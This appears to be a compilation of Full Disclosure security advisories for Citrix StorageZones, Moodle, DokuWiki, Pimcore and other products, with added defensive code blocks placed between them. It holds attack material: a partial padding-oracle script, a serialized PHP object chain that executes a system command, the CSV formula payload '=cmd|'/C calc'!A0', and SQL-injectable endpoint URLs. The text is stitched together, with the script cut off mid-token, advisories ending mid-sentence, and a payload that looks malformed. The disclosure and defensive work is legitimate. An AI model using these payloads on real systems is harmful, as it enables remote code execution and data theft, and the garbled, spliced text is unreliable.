2018-07-03: Telling them that it is a security issue they have already known
about for two months without seemingly acting upon it.
Vendor: product managers have been informed and will contact us;
no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product
team to take into consideration. They will be following up with you as
they may need. We appreciate you following up regarding this request."
2018-07-12

[FD] SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller

2018-09-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
  title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
 vulnerable version: all versions before 5.4.2
  fixed version: 5.4.2
 CVE number: CVE-2018-16968, CVE-2018-16969
 impact: Medium
   homepage: https://www.citrix.com/
  found: 2018-08
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely
exchange documents. ShareFile Enterprise provides enterprise-class service and
includes StorageZones Controller and the User Management Tool. ShareFile
StorageZones Controller extends the ShareFile software as a service (SaaS)
cloud storage by providing your ShareFile account with private data storage,
referred to as StorageZones for ShareFile Data. [...]."

URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html


Business recommendation:

Users of this product are advised to install the security patch provided by
Citrix.

The vulnerabilities identified suggest that no sufficient technical security
audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult
recommends Citrix to conduct such an audit.


Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only
available to the internal network (e.g. CIFS Windows shares) to clients
connecting from the Internet.

In order to hide internal network paths from the user and to only allow
access to paths specifically allowed by the administrator, internal network
paths are encrypted. E.g. if an administrator wants to allow access to a UNC
path (e.g. \\testhost\testshare\testdir), this string is encrypted and provided
to the client. When the user calls the API to e.g. list the contents of this
directory, the StorageZones Controller returns the encrypted absolute paths for
each directory entry. This way, the absolute internal paths are always hidden
from the user.

1) Improper Access Restrictions
The Citrix StorageZones Controller offers users functionality to convert UNC
paths into their encrypted form. Therefore, users are able to access any UNC
path accessible by the StorageZones Controller.

When providing access to a network share, the StorageZones Controller
impersonates the user. Therefore, unauthorized access to network shares is not
possible.

However, Citrix StorageZones Controller internally does not distinguish between
UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows).
Therefore, users may access (e.g. read, write, delete) local paths for which
they have appropriate NTFS permissions.

Note: Citrix StorageZones allows an administrator to define the paths exposed by
the StorageZones Controller. By configuring this setting an administrator can
restrict access to only network paths. The configuration page incorrectly states
that a value of "*" (the default value) "allows connections to all hosts on the
internal network", while in fact it also allows access to local paths.

2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is
vulnerable to a padding oracle attack. This allows an attacker to partly decrypt
or potentially modify internal paths.

3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the
preconditions to exploit vulnerability #1 are met. In practice this
vulnerability has a similar effect as vulnerability #1.


Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:

https:///cifs/v3/Items/ByPath?path=c:\

The following URL demonstrates how e.g. the contents of the directory can be
listed:

https:///cifs/v3/Items()?$expand=Children


2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be
decrypted. It may also be possible to partly modify encrypted paths (this has
not been verified).

 snip 
import sys
sys.path.append('python-paddingoracle')

from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
import getpass

URL = 'http:///'
AUTH = (raw_input('User: '),
getpass.getpass('Password: '))

CIPHER = ''

class PadBuster(PaddingOracle):
def __init__(s
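Vulnerabilities 1 and 3 share a root cause: the controller accepted whatever path string the client supplied and only then encrypted or resolved it. The function below is added here as an example and is not Citrix's code. It performs the two checks a defender wants in front of that step: that the path is a UNC path on an allowed host (not a drive-letter, relative or `\\?\` device path) and that it contains no `.`/`..` components, using Python's platform-independent `ntpath` for the Windows-style splitting. `allowed_hosts` and the reason strings are assumed names; the `*` default mirrors the setting the advisory describes but, unlike the behaviour it reports, still refuses local paths.

```python
import ntpath
import re

# Windows device/verbatim prefixes look like UNC paths but address local objects.
DEVICE_PREFIXES = ('\\\\?\\', '\\\\.\\')
HOSTNAME_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9.-]*$')


def classify_path(path):
    """Return 'device', 'unc' or 'local' for a Windows-style path string.

    'local' covers drive-letter paths (C:\\Windows), rooted paths (\\Windows)
    and relative paths; only \\\\host\\share\\... counts as 'unc'.
    """
    normalized = path.replace('/', '\\')
    if normalized.startswith(DEVICE_PREFIXES):
        return 'device'
    drive, _tail = ntpath.splitdrive(normalized)
    return 'unc' if drive.startswith('\\\\') else 'local'


def validate_requested_path(path, allowed_hosts='*'):
    """Decide whether a client-supplied path may be exposed.

    Returns (ok, reason). allowed_hosts is '*' (any host) or a set of host
    names; in both cases local and device paths are refused, which is the
    distinction the advisory says the controller did not make.
    """
    normalized = path.replace('/', '\\')
    # Reject traversal before any normalisation: ntpath.normpath silently drops
    # '..' components that climb above a UNC share root, which would hide the attempt.
    components = [c for c in normalized.split('\\') if c]
    if any(c in ('.', '..') for c in components):
        return False, 'traversal component'
    kind = classify_path(normalized)
    if kind != 'unc':
        return False, f'{kind} path, only UNC paths are exposed'
    drive, _tail = ntpath.splitdrive(normalized)
    parts = drive.lstrip('\\').split('\\')
    if len(parts) != 2 or not parts[1]:
        return False, 'missing share name'
    host = parts[0]
    if not HOSTNAME_RE.match(host):
        return False, 'malformed host name'
    if allowed_hosts != '*' and host.lower() not in {h.lower() for h in allowed_hosts}:
        return False, f'host {host} not in allow list'
    return True, 'ok'
```

The traversal check deliberately runs on the raw components rather than on a normalised path, because a normaliser that collapses `\\testhost\testshare\..\..\secret` into `\\testhost\testshare\secret` would turn an attack into a silently accepted request instead of a logged rejection.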
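Vulnerability 2 exists because a tampered ciphertext is still decrypted and unpadded, so the server's two failure modes (bad padding versus a path that does not exist) leak one bit per probe. The defender's fix is to authenticate the ciphertext and reject any token that fails verification with one uniform error before the plaintext is touched. The example below is added here and is not Citrix's scheme: it uses an encrypt-then-MAC construction built only from the standard library (an HMAC-SHA256 keystream for confidentiality, a second HMAC-SHA256 as the tag, constant-time comparison via `hmac.compare_digest`); in production an AEAD such as AES-GCM gives the same property in one primitive. `master`, the derivation labels and the function names are assumptions.

```python
import base64
import hashlib
import hmac
import os

NONCE_LEN = 16
TAG_LEN = 32


class InvalidToken(ValueError):
    """Single error type for every verification failure (no padding/MAC distinction)."""


def _derive_keys(master):
    # Independent keys for encryption and authentication, derived from one secret.
    enc_key = hmac.new(master, b'path-token/enc', hashlib.sha256).digest()
    mac_key = hmac.new(master, b'path-token/mac', hashlib.sha256).digest()
    return enc_key, mac_key


def _keystream(key, nonce, length):
    # HMAC-SHA256 in counter mode as a PRF-based stream cipher (assumed construction).
    blocks = []
    counter = 0
    while len(blocks) * hashlib.sha256().digest_size < length:
        blocks.append(hmac.new(key, nonce + counter.to_bytes(4, 'big'), hashlib.sha256).digest())
        counter += 1
    return b''.join(blocks)[:length]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def protect_path(master, path, nonce=None):
    """Turn an internal path into an opaque, authenticated token for the client."""
    enc_key, mac_key = _derive_keys(master)
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    plaintext = path.encode('utf-8')
    ciphertext = _xor(plaintext, _keystream(enc_key, nonce, len(plaintext)))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(nonce + ciphertext + tag).decode('ascii')


def unprotect_path(master, token):
    """Verify the tag first; only an authentic token is ever decrypted."""
    enc_key, mac_key = _derive_keys(master)
    try:
        raw = base64.urlsafe_b64decode(token.encode('ascii'))
    except (ValueError, UnicodeEncodeError):
        raise InvalidToken('invalid token') from None
    if len(raw) < NONCE_LEN + TAG_LEN:
        raise InvalidToken('invalid token')
    nonce, ciphertext, tag = raw[:NONCE_LEN], raw[NONCE_LEN:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise InvalidToken('invalid token')  # same error for every kind of tampering
    return _xor(ciphertext, _keystream(enc_key, nonce, len(ciphertext))).decode('utf-8')


def token_is_valid(master, token):
    try:
        unprotect_path(master, token)
    except InvalidToken:
        return False
    return True


def tampering_is_rejected(master, token, byte_index=NONCE_LEN, bit=0x01):
    """Flip one bit (what a padding-oracle probe does) and report whether the
    server refuses the token without revealing anything about the plaintext."""
    raw = bytearray(base64.urlsafe_b64decode(token.encode('ascii')))
    raw[byte_index] ^= bit
    return not token_is_valid(master, base64.urlsafe_b64encode(bytes(raw)).decode('ascii'))
```

Because the tag covers nonce and ciphertext and is checked before any decryption, every modified token takes the same code path and produces the same response; there is no second failure mode left for an oracle to distinguish. The stream-cipher choice also removes padding altogether, but it is the authentication step, not the absence of padding, that closes the attack.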

[FD] SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform

2018-09-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
  title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
 vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and
 earlier unsupported versions
  fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
 CVE number: CVE-2018-14630
 impact: critical
   homepage: https://moodle.org/
  found: 2018-07-08
 by: Johannes Moritz (Office Berlin)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators
and learners with a single robust, secure and integrated system to create
personalised learning environments. Powering tens of thousands of learning
environments globally, Moodle is trusted by institutions and organisations
large and small, including Shell, London School of Economics,
State University of New York, Microsoft and the Open University. Moodle’s
worldwide numbers of more than 90 million users across both academic and
enterprise level usage makes it the world’s most widely used learning platform."

Source: https://moodle.org/about


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy
Moodle XML format, the passed feedback answer is used unsanitized in an
unserialize() function, which leads to a PHP Object Injection vulnerability.
By providing a sophisticated PHP Object chain it is possible to leverage the
POI into a full-blown arbitrary Remote Code Execution (RCE).

To exploit this vulnerability an attacker needs permissions to create a quiz
or at least be able to import questions. A user of the role teacher usually has
these permissions. However, students can also be assigned to the role teacher
for a specific course.


Proof of concept:
-
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
In order to exploit this issue an attacker has to open Moodle's question bank
for a specific course and import the following Moodle XML file. The answer
feedback contains a sophisticated PHP object chain which only contains objects
from Moodle's library. After the parsing process the command "echo `whoami`" is
being executed.

[The XML markup of the import file was lost in extraction; the serialized
answer feedback it carried follows.]

O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2:{s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;}


Vulnerable / tested versions:
-
The following version has been tested which was the most recent one at the
time of the test:

* 3.5.1+

According to the vendor, all previous versions are affected as well:
* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions


Vendor contact timeline:

2018-07-08: Vulnerability identified, further analysis (credits to Robin
Peraglie from RIPS Technologies)
2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]
created)
2018-07-09: Vendor replied and supplied a fix for the vulnerability
2018-09-10: Vendor releases patched version
2018-09-18: Public release of security advisory


Solution:
-
The vendor provides a patched version (3.5.2) which should be installed
immediately:
https://download.moodle.org/releases/latest/

The vendor also provided a security advisory regarding this issue:
https://moodle.org/mod/forum/discuss.php?d=376023#p1516118


Workaround:
---
Disable import of ddwtos questions through XML files.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe |
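The import path described above hands attacker-controlled text to unserialize(), and PHP will instantiate any class the string names unless told otherwise. The parser below is an added example, not Moodle's code and unrelated to its fix: it reads the PHP serialize() format and lists the classes a payload would instantiate, so an import filter can refuse anything that is not plain scalar or array data before it reaches unserialize(). `is_safe_to_unserialize` mirrors the `allowed_classes` option that PHP 7.0+ accepts on unserialize() itself. The sample feedback strings are constructed, not the advisory's payload.

```python
class PhpSerializeError(ValueError):
    """Malformed or truncated serialize() data."""


def parse_php_serialized(data):
    """Parse PHP serialize() output into Python values.

    Returns (value, classes); classes lists every class named by an O: (object)
    or C: (custom serializable) record, in order of appearance. Objects become
    dicts carrying a '__class__' key. Length fields count bytes, so text is
    re-read as latin-1 to make one character equal one byte.
    """
    if isinstance(data, str):
        data = data.encode('utf-8').decode('latin-1')
    classes = []
    pos = 0

    def expect(literal):
        nonlocal pos
        if data[pos:pos + len(literal)] != literal:
            raise PhpSerializeError(f'expected {literal!r} at offset {pos}')
        pos += len(literal)

    def read_until(terminator):
        nonlocal pos
        end = data.find(terminator, pos)
        if end == -1:
            raise PhpSerializeError(f'missing {terminator!r} after offset {pos}')
        token, pos = data[pos:end], end + 1
        return token

    def read_quoted(length):
        nonlocal pos
        expect('"')
        if pos + length > len(data):
            raise PhpSerializeError('string length exceeds input')
        text, pos = data[pos:pos + length], pos + length
        expect('"')
        return text

    def read_entries(count):
        expect('{')
        items = [(read_value(), read_value()) for _ in range(count)]
        expect('}')
        return items

    def read_value():
        nonlocal pos
        if pos >= len(data):
            raise PhpSerializeError('unexpected end of input')
        tag, pos = data[pos], pos + 1
        if tag == 'N':
            expect(';')
            return None
        expect(':')
        if tag == 'b':
            return read_until(';') == '1'
        if tag == 'i':
            return int(read_until(';'))
        if tag == 'd':
            return float(read_until(';'))
        if tag == 's':
            text = read_quoted(int(read_until(':')))
            expect(';')
            return text
        if tag == 'a':
            return dict(read_entries(int(read_until(':'))))
        if tag in ('O', 'C'):
            class_name = read_quoted(int(read_until(':')))
            classes.append(class_name)
            expect(':')
            if tag == 'C':  # C:len:"Class":size:{opaque} -- skip the custom payload
                size = int(read_until(':'))
                expect('{')
                pos += size
                expect('}')
                return {'__class__': class_name}
            obj = {'__class__': class_name}
            obj.update(read_entries(int(read_until(':'))))
            return obj
        raise PhpSerializeError(f'unknown type tag {tag!r} at offset {pos - 1}')

    value = read_value()
    if pos != len(data):
        raise PhpSerializeError(f'trailing data at offset {pos}')
    return value, classes


def is_safe_to_unserialize(data, allowed_classes=()):
    """True only when the payload parses and every embedded class is allow-listed."""
    try:
        _, classes = parse_php_serialized(data)
    except PhpSerializeError:
        return False
    return all(name in allowed_classes for name in classes)


# Constructed samples: plain array data as a legitimate import would carry, and
# the same kind of record wrapping objects, which a question import has no reason to contain.
PLAIN_FEEDBACK = 'a:2:{i:0;s:5:"hello";s:3:"key";i:42;}'
OBJECT_FEEDBACK = 'O:8:"stdClass":1:{s:4:"name";O:9:"Exception":0:{}}'
```

The same decision can be made inside PHP by calling `unserialize($data, ['allowed_classes' => false])`, which turns every object record into `__PHP_Incomplete_Class` instead of instantiating it; the pre-parse above is useful where the import layer wants to reject and log the payload rather than let it reach the deserializer at all.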

[FD] SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki

2018-09-06 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
  title: CSV Formula Injection
product: DokuWiki
 vulnerable version: 2018-04-22a "Greebo" and older versions
  fixed version: None
 CVE number: CVE-2018-15474
 impact: Medium
   homepage: https://www.dokuwiki.org
  found: 2018-07-09
 by: Jean-Benjamin Rousseau (Office Zurich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software
that doesn't require a database. It is loved by users for its clean and
readable syntax. The ease of maintenance, backup and integration makes it
an administrator's favorite. Built in access controls and authentication
connectors make DokuWiki especially useful in the enterprise context
and the large number of plugins contributed by its vibrant community allow
for a broad range of use cases beyond a traditional wiki."

Source: https://www.dokuwiki.org/dokuwiki


Business recommendation:

The issue will not be fixed according to the vendor. Users are advised
to be careful when opening files via the CSV export functionality.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users"
feature which allows the export of user data (username, real name,
email address and user groups) as a CSV file. On the registration page,
it is possible for an attacker to set certain values in the Real Name field
that - when exported and opened with a spreadsheet application
(Microsoft Excel, Open Office, etc.) - will be interpreted as a formula.
This puts the administrators who open those malicious exported files at risk.
Exfiltration of sensitive data or even the execution of arbitrary code
on the local machine of the victim will be the result. The final impact
depends on the spreadsheet software used on the victim's client.


Proof of concept:
-
1) CSV Formula Injection vulnerability
Registration URL:
http://www.example.com/doku.php?id=start&do=register

When the registration request is submitted, the following parameters are sent
in a POST request:

sectok=&do=register&save=1&login=login_parameter&fullname=evil_csv_formula_injection_payload&email=email_address

The "fullname" parameter is not sanitized before being stored and during
the CSV export. An attacker can inject different CSV formula
payloads in the fullname parameter.
For example:
=cmd|'/C calc'!A0

As soon as the file gets opened in Microsoft Excel, the program calc.exe is
launched. Different warnings might pop up. However, these warnings are usually
ignored because the file comes from a trusted source.


Vulnerable / tested versions:
-
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz

Also found to be vulnerable:
 2017-02-19 stable release
 2016-06-26 stable release
 2015-08-10 stable release
 2014-09-29 stable release
 2014-05-05 stable release
 2013-12-08 stable release


Vendor contact timeline:

2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory


Solution:
-
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality 
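The export described above writes the Real Name field into the CSV verbatim. The sanitiser below is an added example, not DokuWiki code (the vendor declined to change the export): it neutralises any cell a spreadsheet would evaluate as a formula and shows the export of a constructed user list, with the page's payload placed in one Real Name field. The column names and the `SAMPLE_USERS` rows are assumptions.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and others treat as the start of a
# formula. The page's payload starts with '='; '+', '-' and '@' behave the same
# way, and a leading tab or carriage return can smuggle one of them past a naive check.
FORMULA_TRIGGERS = ('=', '+', '-', '@', '\t', '\r')


def sanitize_csv_cell(value):
    """Neutralise a cell that a spreadsheet would evaluate as a formula.

    A leading single quote tells spreadsheets to store the cell as text, so the
    administrator still sees what was entered but nothing is executed. Cells
    that cannot trigger a formula are returned unchanged.
    """
    text = '' if value is None else str(value)
    if text.lstrip(' ').startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_users_csv(users):
    """Write user rows (dicts) to CSV text with every cell sanitised.

    csv.QUOTE_ALL keeps delimiters and quotes inside a cell from breaking the
    row structure; sanitisation covers what the spreadsheet does after parsing.
    """
    fieldnames = ['user', 'name', 'mail', 'groups']
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator='\n')
    writer.writeheader()
    for row in users:
        writer.writerow({k: sanitize_csv_cell(row.get(k, '')) for k in fieldnames})
    return buf.getvalue()


# Constructed sample registrations; the second carries the page's formula
# payload in the Real Name field, the third a name that merely starts with '-'.
SAMPLE_USERS = [
    {'user': 'alice', 'name': 'Alice Example', 'mail': 'alice@example.com', 'groups': 'user'},
    {'user': 'mallory', 'name': "=cmd|'/C calc'!A0", 'mail': 'mallory@example.com', 'groups': 'user'},
    {'user': 'bob', 'name': '-Bob', 'mail': 'bob@example.com', 'groups': 'user,admin'},
]
```

Sanitising at export time is the right layer here because the stored value itself is harmless in the wiki; the risk only appears when the bytes are handed to a spreadsheet, so the export is where the defender controls the rendering context.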

[FD] SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore

2018-08-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
  title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
 vulnerable version: 5.2.3 and below
  fixed version: 5.3.0
 CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
 impact: High
   homepage: https://pimcore.com/en
  found: 2018-06-11
 by: T. Silpavarangkura (Office Bangkok)
 N. Rai-Ngoen (Office Bangkok)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for
master data management (PIM/MDM), user experience management (CMS/UX), digital
asset management (DAM) and eCommerce."

Source: https://pimcore.com/en


Business recommendation:

The vendor provides a patch for most identified issues, but XSS will not be
fixed according to the vendor.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected by further security issues.


Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web
service API. An attacker who obtains a valid API key that is granted a
necessary permission could successfully perform an attack to extract
information from the database.

2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified
across multiple functions in the application, which allows an authenticated
attacker to insert arbitrary JavaScript code in virtually all text fields and
data entries in the application.

3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing
anti-CSRF token, which allows an attacker to perform a cross-site request
forgery attack to at least add, update or delete entries, among other actions.


Proof of concept:
-
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]&condition=
http:///webservice/rest/asset-inquire?apikey=[...]&id=
http:///webservice/rest/asset-list?apikey=[...]&condition=
http:///webservice/rest/document-count?apikey=[...]&condition=
http:///webservice/rest/document-inquire?apikey=[...]&id=
http:///webservice/rest/document-list?apikey=[...]&condition=
http:///webservice/rest/object-count?apikey=[...]&condition=
http:///webservice/rest/object-inquire?apikey=[...]&id=
http:///webservice/rest/object-list?apikey=[...]&condition=

Note that a valid API key that is granted at least either "Assets", "Documents"
or "Objects" permission is required to perform an SQL injection attack against
associated API endpoints successfully.


2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application
are vulnerable to the cross-site scripting vulnerability, which can be
exploited by an authenticated attacker. For example, the attacker could insert
an attack payload while performing at least the following actions:

1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
Field-Collections/Objectbrick/Classification Store item.


The vendor stated that many identified XSS issues only affect administrative
functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges
required) - so this isn't used by non-trusted users - a check just adds
additional overhead without any benefits for security."

SEC Consult argued multiple times that XSS can still be exploited e.g. when a
higher privileged user gets attacked and the issues should be fixed
nevertheless.


3. Cross-site Request Forgery (CVE-2018-14057)
The existing anti-CSRF token in the HTTP request header named
"X-pimcore-csrf-token" was found to be validated only in the "Settings >
Users / Roles" function. Therefore, an attacker could perform a cross-site
request forgery attack against virtually all other functions in order to
at least add, update and delete data without having to submit the anti-CSRF
token.

A non-exhaustive list of affected requests is given below:
POST /admin/asset/a
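The CSRF finding above is a coverage problem rather than a missing mechanism: the token exists, but only one function checks it. The following check is an added example, not Pimcore's implementation, of the property a reviewer would want, a single verification applied to every non-safe request regardless of route, using the header name from the advisory. The route paths, `SESSION_TOKEN` and the function names are constructed.

```python
import hmac
import secrets

CSRF_HEADER = 'X-pimcore-csrf-token'  # header name from the advisory
SAFE_METHODS = frozenset({'GET', 'HEAD', 'OPTIONS'})  # must not change state


def issue_csrf_token():
    """Per-session random token, stored server-side and handed to the UI."""
    return secrets.token_urlsafe(32)


def csrf_check(method, path, headers, session_token):
    """Return (allowed, reason) for one request.

    Every state-changing request is checked whatever path it targets; the
    flaw described above was a check wired into a single function only.
    """
    if method.upper() in SAFE_METHODS:
        return True, 'safe method'
    if not session_token:
        return False, 'no session token'
    # Header names are case-insensitive, so normalise before the lookup.
    supplied = {k.lower(): v for k, v in headers.items()}.get(CSRF_HEADER.lower())
    if supplied is None:
        return False, f'missing {CSRF_HEADER} on {method} {path}'
    if not hmac.compare_digest(supplied.encode('utf-8'), session_token.encode('utf-8')):
        return False, f'token mismatch on {method} {path}'
    return True, 'token verified'


def audit_requests(requests, session_token):
    """Run csrf_check over (method, path, headers) records; return those that would be forged."""
    return [(method, path) for method, path, headers in requests
            if not csrf_check(method, path, headers, session_token)[0]]


# Constructed sample: one request per category. The /admin/... paths are
# stand-ins modelled on the advisory's listing, not Pimcore's real route table.
SESSION_TOKEN = 'constructed-session-token'
SAMPLE_REQUESTS = [
    ('GET', '/admin/asset/list', {}),
    ('POST', '/admin/user/update', {'X-pimcore-csrf-token': SESSION_TOKEN}),
    ('POST', '/admin/asset/add', {}),
    ('POST', '/admin/document/delete', {'x-pimcore-csrf-token': 'wrong'}),
]
```

Placing the check in one middleware-style function that every handler passes through is what makes the "validated only in Settings > Users / Roles" situation impossible to reintroduce by adding a new endpoint.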

[FD] Adobe Patches Vulnerability Affecting Internal Systems

2018-07-20 Thread Vulnerability Lab
Title: Adobe Patches Vulnerability Affecting Internal Systems
Source:
https://www.securityweek.com/adobe-patches-vulnerability-affecting-internal-systems

Title: Adobe on internal systems security hole
Source: https://www.theregister.co.uk/2018/07/19/adobe_internal_systems_bug/

References: Hacker Injects Arbitrary Codes to Main Lead Database of
Adobe Systems
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-arbitrary-codes-main-lead-database-adobe-systems

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Adobe Systems - Arbitrary Code Injection Vulnerability

2018-07-19 Thread Vulnerability Lab
d and the case scenario has been delivered fully transparently to ensure the
problem becomes visible to Adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)


Security Risk:
==
The security risk of the arbitrary code injection vulnerability in the
adobe web services is estimated as high.


Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability mainly for incidental or
consequential damages so the foregoing limitation may not apply. We do not
approve or encourage anybody to break any licenses, policies, deface websites,
hack into databases or trade with stolen data. We have no need for criminal
activities or membership requests. We do not publish advisories or
vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher
groups or individuals. We do not publish trade researcher mails, phone numbers,
conversations or anything else to journalists, investigative authorities or
private individuals.

Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file,
resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark of vulnerability-lab team & the specific authors or managers. To
record, list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™





[FD] GhostMail - (Status Message) Persistent Web Vulnerability

2018-07-18 Thread Vulnerability Lab
Document Title:
===
GhostMail - (Status Message) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1470


Release Date:
=
2018-06-27


Vulnerability Laboratory ID (VL-ID):

1470


Common Vulnerability Scoring System:

4


Vulnerability Class:

